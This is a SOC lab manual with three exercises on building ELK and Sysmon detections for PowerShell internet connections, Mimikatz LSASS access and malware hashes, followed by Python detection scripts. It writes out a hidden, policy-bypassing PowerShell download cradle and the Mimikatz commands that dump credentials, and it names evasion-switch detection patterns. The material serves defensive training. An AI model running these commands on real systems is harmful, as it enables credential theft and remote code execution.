Exercise 6-8
Exercise 6: Host Level Incident Detection: Creating ELK Use Case for Monitoring Trusted Binaries Connecting to the Internet
Lab Scenario
Attackers use trusted, already-installed binaries to download and execute malicious code from remote sources. PowerShell is the most common of these: it serves as a downloader, as a lateral-movement tool and as the engine behind fileless attacks. Monitoring PowerShell processes that connect to the internet lets a SOC analyst act quickly to contain the damage and prevent further compromise.
Lab Objectives
The objective of this lab is to create an ELK SIEM use case for monitoring PowerShell commands that connect to the internet to download and execute scripts.
Lab Tasks
- Click WinServer2012.
- Press Ctrl+Alt+Del. By default the Admin account is selected; type Pa$$w0rd and press Enter to log in.
Note: If WinServer2012 is already launched and logged in, skip the login step.
- A pop-up "Do you want to find PCs, devices, and content on this network, and automatically connect to devices like printers and TVs?" will appear. Click Yes.
- To install and configure Sysmon, navigate to E:\SOC-Tools\Module 04 Incident Detection with Security Information and Event Management (SIEM) and copy Sysmon.zip.
Note: Sysmon (System Monitor) is a Windows system service that records process creation, network connections, process access and other activity to the Windows event log, including details about PowerShell activity that the standard Security log does not capture.
Note: If you get a Windows Security pop-up, click OK.
- Paste the copied Sysmon.zip file under the C: drive.
- Right-click Sysmon.zip under C: and unzip it using the Extract Here option from the context menu. Delete the zip file after unzipping.
- To configure Sysmon to log processes that open a handle to lsass.exe, open the Sysmon folder, right-click sysmonconfig-export.xml and click Edit with Notepad++ from the context menu.
Note: The Local Security Authority Subsystem Service (lsass.exe) enforces the local security policy: it verifies logons, handles password changes and issues access tokens, so its memory holds credential material. Credential dumpers open a handle to it to read passwords and hashes, and some malware names itself lsass.exe (in a directory other than C:\Windows\System32) to blend in with the real process.
- Go to line 450 and add the following line. It belongs in the ProcessAccess include rules, so that Sysmon records an event ID 10 whenever a process opens a handle to LSASS:
<TargetImage condition="is">C:\Windows\system32\lsass.exe</TargetImage>
- Go to line 452 and add the following lines. The VMware authentication service legitimately opens LSASS on the lab VM, so excluding it keeps that noise out of the log:
<ProcessAccess onmatch="exclude"> <SourceImage condition="is">C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe</SourceImage> </ProcessAccess>
- Click Save and close all open windows.
- To open a command prompt in Administrator mode, right-click the Windows Start button and click Command Prompt (Admin) from the context menu.
- The command prompt window opens. Type cd C:\Sysmon and press Enter to change to the Sysmon directory.
- To install Sysmon with the edited configuration, type Sysmon.exe -i sysmonconfig-export.xml -accepteula -h md5,sha256 -n -l and press Enter.
Note: -i installs the service with the given configuration file, -accepteula accepts the licence silently, -h md5,sha256 records both hashes for every image (Exercise 8 relies on these), -n logs network connections (event ID 3, which this exercise uses) and -l logs image loads.
- You will see the message "Sysmon started."
- To make the Sysmon service start automatically at boot, type sc config Sysmon start= auto and press Enter (the space after start= is required). The service start type changes to Automatic. Close the command prompt window.
- Navigate to E:\SOC-Tools\Module 04 Incident Detection with Security Information and Event Management (SIEM) and copy the Beats folder.
- Paste the copied Beats folder under the C: drive.
- Open the Beats folder. Right-click winlogbeat-6.5.4-windows-x86_64.zip under C:\Beats and unzip it. Delete the zip file after unzipping.
- Click the Windows Start button. Right-click the Windows PowerShell icon and click Run as Administrator from the context menu.
- Type cd C:\Beats\winlogbeat-6.5.4-windows-x86_64 and press Enter to change to the winlogbeat directory.
- To install winlogbeat as a service, type PowerShell.exe -ExecutionPolicy UnRestricted -File .\install-service-winlogbeat.ps1 and press Enter. The winlogbeat service is created; its status stays Stopped until you start it later.
Note: If a security warning appears, type R and press Enter to run the script once.
- Navigate to C:\Beats\winlogbeat-6.5.4-windows-x86_64 and open winlogbeat.yml with Notepad++.
- In the winlogbeat.event_logs section, add the following line at line 25:
- name: Microsoft-Windows-Sysmon/Operational
Note: YAML is indentation-sensitive: the copied line must be indented exactly like the previous "- name:" entry, otherwise winlogbeat refuses to start. Without this entry winlogbeat ships only the default Windows event logs and none of the Sysmon events.
- In the Kibana section under setup.kibana: (line 71), delete the # to uncomment the host line and change host: "localhost:5601" to host: "10.10.1.79:5601".
- In the Elasticsearch output section under output.elasticsearch: (line 98), change hosts: ["localhost:9200"] to hosts: ["10.10.1.79:9200"].
- Save winlogbeat.yml and close it.
- To test the winlogbeat configuration, switch to the Windows PowerShell window, type .\winlogbeat.exe test config -c .\winlogbeat.yml -e and press Enter. The message "Config OK" is displayed.
Note: The PowerShell window must still be in the C:\Beats\winlogbeat-6.5.4-windows-x86_64 directory when you run this command; if it is not, change to that directory first as in the earlier cd step. Close all open windows.
- Right-click the Windows Start button, click Search, type services in the search field and click Services to open the Services window.
- To start the winlogbeat service, find and select winlogbeat in the list and click Start in the left pane.
- Close the Services window.
- Click the SecurityOnion machine.
- Enter username administrator and password toor, then press Enter to log in.
- To open a terminal, right-click the desktop and click Open Terminal.
- To open the Security Onion firewall for the Windows host, type sudo so-allow and press Enter. Type toor as the password and press Enter.
- At "Please enter your selection", type b to choose Logstash Beat - port 5044/tcp and press Enter.
- At "Please enter the IP address (or CIDR range) you'd like to allow to connect to port(s): 5044", type 10.10.1.12 (the address of WinServer2012) and press Enter. At "To continue and add this rule, press Enter. Otherwise, press Ctrl-c to exit", press Enter.
- To allow the Elasticsearch REST endpoint on port 9200, type sudo so-allow and press Enter. At the selection prompt type e and press Enter. At "Please enter the IP address (or CIDR range) you'd like to allow to connect to port(s): 9200", type 10.10.1.12 and press Enter, then press Enter again to add the rule. Close the terminal.
Note: As configured above, winlogbeat writes directly to Elasticsearch, so the 9200 rule is the one it actually needs; the 5044 rule only matters if output.logstash is enabled instead. If asked for a password, type toor and press Enter. To confirm that the Windows host can now reach Elasticsearch, run .\winlogbeat.exe test output -c .\winlogbeat.yml -e from an Administrator PowerShell in the winlogbeat directory on WinServer2012.
- To launch Kibana, double-click the Kibana shortcut icon on the desktop.
- A "Your connection is not private" page appears because Kibana on Security Onion presents a self-signed certificate; click ADVANCED.
- Click the Proceed to localhost (unsafe) link.
- The login screen appears; type username martin and password martin@123.
- On the Kibana home page, if the Kibana status is shown as Red, refresh the page until the status is Green or you are redirected to the Management --> Create index pattern page.
- On the Management --> Create index pattern page, in Step 1 of 2: Define index pattern, type winlogbeat*. As you type, the matching winlogbeat indices are listed. Click the Next step button.
Note: If no winlogbeat indices appear, no events have reached Elasticsearch yet. Wait a few minutes (check that the winlogbeat service is running on WinServer2012 and that both so-allow rules were added) and repeat this step.
- In Step 2 of 2: Configure settings, select @timestamp from the Time Filter field name drop-down and click the Create index pattern button.
- The index pattern page lists the fields of the created index. Click Discover in the left menu.
- Launch WinServer2012.
- To open PowerShell, click the Windows Start button, right-click the Windows PowerShell icon and click Run as Administrator from the context menu.
- To simulate an attacker using PowerShell's WebClient to download and run a remote script, type the following command and press Enter:
powershell -exec bypass -nop -w hidden "IEX ((new-object net.webclient).downloadstring('https://www.google.com'))"
Note: -exec bypass disables the execution-policy check, -nop prevents PowerShell from loading profile scripts (which run on launch and could interfere with or log the attacker's code), and -w hidden stops PowerShell from showing a window while it runs. A PowerShell command launched with these switches together is a strong indicator of malicious use. In this demo the download string points at https://www.google.com, so nothing harmful runs (IEX merely fails to parse the returned HTML), but the outbound connection is made and logged exactly as it would be if the attacker had substituted the URL of a malicious script.
- Close all open windows.
- Launch the SecurityOnion machine. On the Kibana Discover page, type event_id:3 AND event_data.Image:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" in the Search... (e.g. status:200 AND extension:PHP) box and click Update.
Note: Event ID 3 is Sysmon's network-connection event. If the query returns nothing although events are flowing, check the query language selected in the search bar: in Lucene syntax each backslash in the path must be escaped as \\. Matching this exact path also misses the 32-bit copy under C:\Windows\SysWOW64 and pwsh.exe, so a production rule should match on the image file name rather than the full path.
- You will see all the PowerShell network connections (event_id 3).
- Expand the first event by clicking the arrow on its left to see its details. From computer_name, event_data.SourceIp and event_data.DestinationIp you can identify the host that initiated the connection and where it connected to.
- This use case reveals any attempt to connect to the internet through a trusted binary (here, PowerShell).
- Close all open windows.
Note: Do not cancel the lab session. You will need the configuration done in this exercise for the upcoming exercises of this module. If you cancel the lab session, you will have to perform these steps again.
In this exercise you have learnt how to create an ELK SIEM use case for monitoring PowerShell commands that connect to the internet to download and execute scripts.
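The Kibana query in this exercise matches one exact path and shows nothing about how PowerShell was launched. The following Python script, added here as an example and not part of the lab, runs the same detection over winlogbeat-style JSON documents and joins each Sysmon event ID 3 with the event ID 1 for the same ProcessGuid, so the command line can be scored for the switches the exercise describes. Field names follow winlogbeat 6.x (event_id, computer_name, event_data.*); the events, GUIDs and destination addresses are constructed for illustration.

```python
import json
import ntpath
import re
from typing import Dict, List, Optional

# Constructed winlogbeat-style documents (winlogbeat 6.x field names). GUIDs and
# addresses are illustrative; 203.0.113.0/24 is a documentation range, not a real server.
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Sysmon event 1: the download cradle from the lab, launched from explorer.exe
    json.dumps({"event_id": 1, "computer_name": "WinServer2012", "event_data": {
        "ProcessGuid": "{A1}", "Image": PS64, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell -exec bypass -nop -w hidden \"IEX ((new-object net.webclient)"
                       ".downloadstring('https://www.google.com'))\""}}),
    # Sysmon event 3: the outbound connection made by that process
    json.dumps({"event_id": 3, "computer_name": "WinServer2012", "event_data": {
        "ProcessGuid": "{A1}", "Image": PS64, "SourceIp": "10.10.1.12",
        "DestinationIp": "203.0.113.10", "DestinationPort": "443"}}),
    # 32-bit PowerShell: a different path, which the lab's exact-path query misses
    json.dumps({"event_id": 3, "computer_name": "WinServer2012", "event_data": {
        "ProcessGuid": "{B2}", "Image": PS32, "SourceIp": "10.10.1.12",
        "DestinationIp": "203.0.113.20", "DestinationPort": "80"}}),
    # A browser connecting out: not a trusted-binary abuse signal, ignored
    json.dumps({"event_id": 3, "computer_name": "WinServer2012", "event_data": {
        "ProcessGuid": "{C3}", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "SourceIp": "10.10.1.12", "DestinationIp": "203.0.113.30", "DestinationPort": "443"}}),
    # An interactive admin console talking to Elasticsearch: reported, but without suspicious switches
    json.dumps({"event_id": 1, "computer_name": "WinServer2012", "event_data": {
        "ProcessGuid": "{D4}", "Image": PS64, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": '"' + PS64 + '"'}}),
    json.dumps({"event_id": 3, "computer_name": "WinServer2012", "event_data": {
        "ProcessGuid": "{D4}", "Image": PS64, "SourceIp": "10.10.1.12",
        "DestinationIp": "10.10.1.79", "DestinationPort": "9200"}}),
]

POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}

# (label, pattern) pairs. PowerShell accepts unambiguous prefixes of its switch names,
# so the patterns cover -nop/-NoProfile, -w/-win/-WindowStyle, -ep/-exec/-ExecutionPolicy, -e/-enc.
SUSPICIOUS_ARGS = [
    ("no-profile", re.compile(r"-nop\w*", re.I)),
    ("hidden-window", re.compile(r"-w(?:i\w*)?\s+h(?:idden)?\b", re.I)),
    ("execpolicy-bypass", re.compile(r"-e(?:p|x\w*)\s+bypass", re.I)),
    ("encoded-command", re.compile(r"-e(?:c|nc\w*)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("download-cradle", re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|invoke-expression|\biex\b", re.I)),
]


def is_powershell(image: str) -> bool:
    """True for any PowerShell host binary, whichever directory it runs from."""
    return ntpath.basename(image).lower() in POWERSHELL_IMAGES


def suspicious_flags(command_line: Optional[str]) -> List[str]:
    """Labels, in SUSPICIOUS_ARGS order, for the switches and cradles found on the command line."""
    if not command_line:
        return []
    return [label for label, pat in SUSPICIOUS_ARGS if pat.search(command_line)]


def detect_powershell_connections(raw_events: List[str]) -> List[Dict]:
    """event_id:3 from a PowerShell image, enriched with the matching event 1 by ProcessGuid."""
    events = [json.loads(line) for line in raw_events]
    # First pass: index process-creation events so each connection can be tied to a command line.
    created = {e["event_data"]["ProcessGuid"]: e["event_data"] for e in events if e["event_id"] == 1}
    alerts = []
    for e in events:
        data = e["event_data"]
        if e["event_id"] != 3 or not is_powershell(data.get("Image", "")):
            continue
        proc = created.get(data.get("ProcessGuid"), {})
        flags = suspicious_flags(proc.get("CommandLine"))
        if "download-cradle" in flags and len(flags) > 1:
            severity = "high"    # cradle plus evasion switches: the lab's indicator
        elif flags:
            severity = "medium"
        else:
            severity = "low"     # PowerShell reaching out at all is still worth a look
        alerts.append({
            "host": e["computer_name"], "image": data["Image"], "parent": proc.get("ParentImage"),
            "command_line": proc.get("CommandLine"), "src": data["SourceIp"],
            "dst": f'{data["DestinationIp"]}:{data["DestinationPort"]}',
            "flags": flags, "severity": severity,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_powershell_connections(SAMPLE_EVENTS):
        print(a["severity"].upper(), a["host"], a["src"], "->", a["dst"], a["flags"], a["command_line"])
```

Matching on the image file name instead of the full path is what makes the SysWOW64 event show up; the join on ProcessGuid is what turns a bare connection record into something an analyst can triage, because the Sysmon event ID 3 itself carries no command line.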
Exercise 7: Host Level Incident Detection: Creating ELK Use Case for Monitoring Credential Dumping using Mimikatz
Lab Scenario
Once an attacker has privileged access to a system, a primary goal is to retrieve credentials from memory. Credential-dumping tools grant themselves read and query access to the LSASS process, which is what reading passwords and hashes out of its memory requires. Sysmon records each such handle request as a process-access event (event ID 10) that includes the GrantedAccess mask, so monitoring processes that open lsass.exe with a memory-read access mask helps a SOC analyst identify credential-theft attempts, whoever performs them.
Lab Objectives
The objective of this lab is to create an ELK SIEM use case that detects access to lsass.exe with a suspicious GrantedAccess value when the Mimikatz tool is used to retrieve credentials from memory.
Lab Tasks
- Click WinServer2012 and press Ctrl+Alt+Del.
- By default the Admin account is selected; type Pa$$w0rd and press Enter to log in.
Note: If WinServer2012 is already launched and logged in, skip the login step.
- To install the Mimikatz tool, navigate to E:\SOC-Tools\Module 04 Incident Detection with Security Information and Event Management (SIEM) and copy mimikatz_trunk.zip.
Note: Mimikatz dumps credentials from memory, including clear-text passwords, NTLM hashes and Kerberos tickets held by LSASS.
Note: If you get a Windows Security pop-up, click OK.
- Paste the copied mimikatz_trunk.zip file under the C: drive.
- Right-click mimikatz_trunk.zip and unzip it by selecting the Extract to mimikatz_trunk\ option. Delete the zip file after unzipping.
- Navigate to C:\mimikatz_trunk\x64 and double-click mimikatz.exe.
- In the mimikatz console window type privilege::debug and press Enter. This enables SeDebugPrivilege for the session, which Mimikatz needs in order to open a handle to LSASS; the console answers Privilege '20' OK.
- To record the output in a log file, type log Userdetails.log and press Enter.
- To dump the logon credentials held in LSASS memory into that log, type sekurlsa::logonpasswords and press Enter. This is the action that makes Sysmon log an event ID 10 with lsass.exe as the target.
- Launch the SecurityOnion machine.
- Enter username administrator and password toor, then press Enter to log in.
- To launch Kibana, double-click the Kibana shortcut icon on the desktop.
- The login screen appears; type username martin and password martin@123 and click Login.
- Click Discover in the left pane, type event_id:10 AND event_data.GrantedAccess:0x1010 in the Search... (e.g. status:200 AND extension:PHP) box and click Update.
Note: 0x1010 is PROCESS_QUERY_LIMITED_INFORMATION (0x1000) combined with PROCESS_VM_READ (0x0010), the access mask this Mimikatz build requests for sekurlsa::logonpasswords. Other dumpers and other Mimikatz versions request different masks (0x1410 and 0x1FFFFF are common), so a production rule should match on event_data.TargetImage being lsass.exe and on any mask that includes the 0x0010 (VM_READ) bit rather than on the single value 0x1010, and should exclude the known-benign sources that also open LSASS.
- You will see every event in which a process opened a handle to another process with this access mask.
- Expand the first event by clicking the arrow on its left to see its details. They show that lsass.exe (event_data.TargetImage) was opened by mimikatz.exe (event_data.SourceImage) with a GrantedAccess value of 0x1010.
- Close all open windows.
In this exercise you have learnt how to create an ELK SIEM use case that detects access to lsass.exe with a suspicious GrantedAccess value when the Mimikatz tool is used to retrieve credentials from memory.
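The single-value query above catches this Mimikatz build and nothing else. The following Python script, added here as an example and not part of the lab, applies the same detection to constructed winlogbeat-style Sysmon event ID 10 documents but widens it: it checks that the target really is C:\Windows\System32\lsass.exe, decodes the GrantedAccess mask and alerts on any mask that can read process memory, and drops the benign source the lab excludes in sysmonconfig-export.xml. The list of known dumper masks and the Windows Defender exclusion are assumptions to tune for your own environment.

```python
import json
import ntpath
from typing import Dict, List, Optional

# Process access rights (winnt.h) relevant to reading credentials out of LSASS.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF

# Access masks documented for common credential dumpers. 0x1010 is what the lab's Mimikatz
# requests (QUERY_LIMITED_INFORMATION | VM_READ); the others are masks other tools and
# Mimikatz versions are known to use. Illustrative, not exhaustive.
KNOWN_DUMPER_MASKS = {0x1010, 0x1410, 0x1438, 0x143A, PROCESS_ALL_ACCESS}

REAL_LSASS = ntpath.normcase(r"C:\Windows\System32\lsass.exe")

# Sources that legitimately open LSASS. The VMware entry is the one the lab excludes in
# sysmonconfig-export.xml; the Defender engine is an assumed example.
BENIGN_SOURCES = {
    ntpath.normcase(r"C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe"),
    ntpath.normcase(r"C:\Program Files\Windows Defender\MsMpEng.exe"),
}


def _ev10(source: str, target: str, access: str) -> str:
    """Build a constructed winlogbeat-style Sysmon event 10 document."""
    return json.dumps({"event_id": 10, "computer_name": "WinServer2012", "event_data": {
        "SourceImage": source, "TargetImage": target, "GrantedAccess": access}})


LSASS = r"C:\Windows\system32\lsass.exe"
SAMPLE_EVENTS = [
    _ev10(r"C:\mimikatz_trunk\x64\mimikatz.exe", LSASS, "0x1010"),               # the lab's event
    _ev10(r"C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe", LSASS, "0x1010"),  # excluded noise
    _ev10(r"C:\Users\Admin\AppData\Local\Temp\dumper.exe", LSASS, "0x410"),      # uncatalogued mask, still VM_READ
    _ev10(r"C:\Temp\notepad.exe", LSASS, "0x1438"),                               # renamed tool, another known mask
    _ev10(r"C:\Windows\System32\taskmgr.exe", LSASS, "0x1000"),                   # query only, cannot read memory
    _ev10(r"C:\mimikatz_trunk\x64\mimikatz.exe", r"C:\Windows\System32\svchost.exe", "0x1010"),  # not LSASS
    json.dumps({"event_id": 1, "computer_name": "WinServer2012",
                "event_data": {"Image": r"C:\Windows\System32\cmd.exe"}}),        # wrong event type
]


def parse_mask(value: str) -> int:
    """Sysmon writes GrantedAccess as a hex string such as '0x1010'."""
    return int(value, 16)


def is_real_lsass(image: str) -> bool:
    """True only for the genuine LSASS binary; a file merely named lsass.exe elsewhere is a separate case."""
    return ntpath.normcase(image) == REAL_LSASS


def classify_access(mask: int) -> Optional[str]:
    """Why a mask matters, or None when it cannot be used to read process memory."""
    if mask in KNOWN_DUMPER_MASKS:
        return "known-dumper-mask"
    if mask & PROCESS_VM_READ:
        return "vm-read"     # uncatalogued mask, but memory can still be read
    return None              # e.g. 0x1000: query only, no access to credentials


def detect_lsass_access(raw_events: List[str]) -> List[Dict]:
    """The lab's event_id:10 AND GrantedAccess:0x1010 query, widened and with noise removed."""
    alerts = []
    for line in raw_events:
        e = json.loads(line)
        if e["event_id"] != 10:
            continue
        d = e["event_data"]
        if not is_real_lsass(d["TargetImage"]):
            continue
        if ntpath.normcase(d["SourceImage"]) in BENIGN_SOURCES:
            continue         # same idea as the exclude rule added to sysmonconfig-export.xml
        mask = parse_mask(d["GrantedAccess"])
        reason = classify_access(mask)
        if reason is None:
            continue
        alerts.append({"host": e["computer_name"], "source": d["SourceImage"],
                       "granted_access": f"0x{mask:X}", "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in detect_lsass_access(SAMPLE_EVENTS):
        print(a["host"], a["source"], a["granted_access"], a["reason"])
```

Decoding the mask rather than string-matching one value is the point: 0x410 is not on any list here, yet it carries PROCESS_VM_READ and is reported, while taskmgr's 0x1000 is dropped because it cannot read memory at all.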
Exercise 8: Host Level Incident Detection: Creating ELK Use Case for Monitoring Malware Activity in the System
Lab Scenario
Monitoring logs for known-malware signatures allows compromised systems to be identified quickly. Sysmon records the hashes of every executable it sees launched, and those hashes can be looked up on virustotal.com to learn whether the file has already been identified as malicious by antivirus engines.
Lab Objectives
The objective of this lab is to create an ELK SIEM use case for monitoring malware activity by checking the file hashes recorded in Sysmon events against virustotal.com.
- Click WinServer2012 and press Ctrl+Alt+Del.
- By default the Admin account is selected; type Pa$$w0rd and press Enter to log in.
Note: If WinServer2012 is already launched and logged in, skip the login step.
- Navigate to E:\SOC-Tools\Module 05 Enhance Incident Detection with Threat Intelligence and copy the wikiworm folder.
- Paste the copied wikiworm folder in the C: drive.
- Navigate to C:\wikiworm and double-click wikiworm.exe. A pop-up box appears; click OK.
Note: wikiworm.exe is a malware sample; run it only inside the isolated lab VM. Launching it produces a Sysmon process-creation event (ID 1) whose Hashes field is what the rest of this exercise uses.
- Launch the SecurityOnion machine.
- Enter username administrator and password toor, then press Enter to log in.
- To launch Kibana, double-click the Kibana shortcut icon on the desktop.
- The login screen appears; type username martin and password martin@123 and click Login.
- Click Discover in the left pane, type wikiworm.exe in the Search... (e.g. status:200 AND extension:PHP) box and click Update.
- Click the Add a filter + link below the search box. In the Add filter pop-up, select event_data.Image from the Fields drop-down, is from the Operators drop-down and C:\wikiworm\wikiworm.exe from the Values drop-down, then click Save.
- Expand the event and copy the MD5 hash value from event_data.Hashes.
Note: The Hashes field has the form MD5=<hash>,SHA256=<hash> (the algorithms passed to -h when Sysmon was installed in Exercise 6); the MD5 value is the text between MD5= and the comma. The SHA256 value identifies the file more reliably, since MD5 collisions are practical, and VirusTotal accepts either.
- Open a new browser tab and go to https://www.virustotal.com. Click Search.
- Paste the copied hash value into the URL, IP address, domain, or file hash box and press Enter.
- VirusTotal looks the hash up among the files it has already analysed and, if the file is known, shows how many antivirus engines detect it, the names they give it and a detailed analysis report.
- In the same way, the hash of any file recorded by Sysmon can be checked to see whether it is known malware.
Note: A hash lookup only finds files VirusTotal has already seen; a recompiled or otherwise modified copy has a different hash, so a clean result does not prove a file is benign. Looking up a hash reveals nothing about your environment, whereas uploading the file itself shares it with VirusTotal and its partners, so prefer the hash lookup when the file may be sensitive.
In this exercise you have learnt how to create an ELK SIEM use case for monitoring malware activity by checking the file hashes in Sysmon events against virustotal.com.
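Copying a hash into the VirusTotal search box works for one event; a use case needs the same check to run over every event that carries a Hashes field. The following Python script, added here as an example and not part of the lab, parses the Sysmon Hashes field from constructed winlogbeat-style documents, looks each hash up in a local indicator list that stands in for the VirusTotal lookup (preferring SHA256 over MD5), and builds the VirusTotal web-UI link for the analyst. The "known bad" hashes are hashes of a constructed byte string, not of any real file, and the URL form is an assumption about VirusTotal's web interface.

```python
import hashlib
import json
from typing import Dict, List, Optional

# A constructed stand-in for the lab's wikiworm.exe: hashing this byte string gives the
# "known bad" values below. No real malware hash appears in this example.
FAKE_SAMPLE = b"constructed stand-in for wikiworm.exe; not a real binary\n"
BAD_MD5 = hashlib.md5(FAKE_SAMPLE).hexdigest()
BAD_SHA256 = hashlib.sha256(FAKE_SAMPLE).hexdigest()
BENIGN = b"constructed stand-in for notepad.exe\n"

# Local indicator list standing in for the VirusTotal lookup, keyed by algorithm.
INDICATORS = {
    "SHA256": {BAD_SHA256: "WikiWorm (constructed)"},
    "MD5": {BAD_MD5: "WikiWorm (constructed)"},
}


def _ev1(image: str, hashes: str) -> str:
    """Build a constructed winlogbeat-style Sysmon event 1 document."""
    return json.dumps({"event_id": 1, "computer_name": "WinServer2012",
                       "event_data": {"Image": image, "Hashes": hashes}})


SAMPLE_EVENTS = [
    _ev1(r"C:\wikiworm\wikiworm.exe", f"MD5={BAD_MD5},SHA256={BAD_SHA256}"),         # the lab's sample
    _ev1(r"C:\Windows\System32\notepad.exe",
         f"MD5={hashlib.md5(BENIGN).hexdigest()},SHA256={hashlib.sha256(BENIGN).hexdigest()}"),
    _ev1(r"C:\Users\Public\svchost.exe", f"MD5={BAD_MD5},SHA256={BAD_SHA256}"),     # same file, renamed
    _ev1(r"C:\Temp\dropper.exe", f"MD5={BAD_MD5.upper()}"),                           # host running Sysmon with -h md5 only
    json.dumps({"event_id": 3, "computer_name": "WinServer2012",                     # no Hashes field at all
                "event_data": {"Image": r"C:\wikiworm\wikiworm.exe", "DestinationIp": "203.0.113.5"}}),
]


def parse_hashes(field: str) -> Dict[str, str]:
    """Sysmon writes 'MD5=...,SHA256=...,IMPHASH=...'; return {ALGORITHM: lower-case hex}."""
    out = {}
    for part in field.split(","):
        if "=" in part:
            algo, value = part.split("=", 1)
            out[algo.strip().upper()] = value.strip().lower()
    return out


def lookup(hashes: Dict[str, str], indicators=INDICATORS) -> Optional[Dict[str, str]]:
    """Prefer SHA256; fall back to weaker algorithms only when that is all the event carries."""
    for algo in ("SHA256", "SHA1", "MD5"):
        value = hashes.get(algo)
        if value and value in indicators.get(algo, {}):
            return {"matched_on": algo, "name": indicators[algo][value]}
    return None


def vt_gui_url(hashes: Dict[str, str]) -> str:
    """Link for the analyst; assumes VirusTotal's web UI accepts a file hash in this path."""
    h = hashes.get("SHA256") or hashes.get("SHA1") or hashes.get("MD5")
    return f"https://www.virustotal.com/gui/file/{h}"


def scan_events(raw_events: List[str], indicators=INDICATORS) -> List[Dict]:
    """Check every event that carries a Hashes field (events 1, 6, 7 and 15 do) against the indicators."""
    hits = []
    for line in raw_events:
        e = json.loads(line)
        field = e["event_data"].get("Hashes")
        if not field:
            continue                      # network, registry and similar events carry no hashes
        hashes = parse_hashes(field)
        match = lookup(hashes, indicators)
        if match:
            hits.append({"host": e["computer_name"], "event_id": e["event_id"],
                         "image": e["event_data"].get("Image") or e["event_data"].get("ImageLoaded"),
                         "matched_on": match["matched_on"], "name": match["name"],
                         "md5_only": "SHA256" not in hashes, "vt_url": vt_gui_url(hashes)})
    return hits


if __name__ == "__main__":
    for h in scan_events(SAMPLE_EVENTS):
        print(h["host"], h["image"], h["name"], "via", h["matched_on"], h["vt_url"])
```

The renamed copy under C:\Users\Public is caught because the match is on content, not on the file name the lab filters on; the md5_only flag marks hosts whose Sysmon was installed without sha256, where the match rests on an algorithm with practical collisions.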